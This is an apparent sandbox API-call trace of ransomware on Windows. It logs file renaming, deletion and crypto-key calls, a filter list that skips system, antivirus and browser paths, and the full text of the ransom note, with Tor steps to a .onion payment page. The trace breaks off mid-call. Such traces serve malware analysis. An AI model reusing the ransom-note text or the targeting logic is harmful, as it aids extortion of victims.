[0160.759] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\.xXE74C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\.xxe74c.tmp")) returned 0xe74c [0160.761] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\.xXE74C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\.xxe74c.tmp"), dwFlags=0x1) returned 0 [0160.761] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\.xXE74C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\.xxe74c.tmp")) returned 1 [0160.761] CryptDestroyKey (hKey=0x9ad278) returned 1 [0160.761] wcslen (_String="OK") returned 0x2 [0160.761] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.761] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.761] CryptDestroyKey (hKey=0x9ad438) returned 1 [0160.761] CryptDestroyHash (hHash=0x9ad378) returned 1 [0160.761] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0160.761] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.761] GetLastError () returned 0x12 [0160.761] FindClose (in: hFindFile=0x9ad578 | out: hFindFile=0x9ad578) returned 1 [0160.761] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.762] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.762] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.762] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.762] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.762] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.762] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.762] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.762] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*.exe") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*.dll") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*.lnk") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*.bat") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*.ini") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*.msi") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*.scf") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*pagefile.sys*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*AppData*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\winrar\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\java\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\windows\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\ESET\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\AVG\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*Atheros*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*Realtek*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*bootmgr*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*boot*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*boot*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*IO.SYS*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*ntldr*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*chrome*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*opera*") returned 0 [0160.763] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", pszSpec="*firefox*") returned 0 [0160.763] wcslen (_String="\\\\?\\") returned 0x4 [0160.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad138 [0160.763] wcscmp (_String1=".", _String2=".") returned 0 [0160.763] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.764] wcscmp (_String1="..", _String2=".") returned 1 [0160.764] wcscmp (_String1="..", _String2="..") returned 0 [0160.764] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.764] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.764] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.764] strlen (_Str="NMoreira") returned 0x8 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, 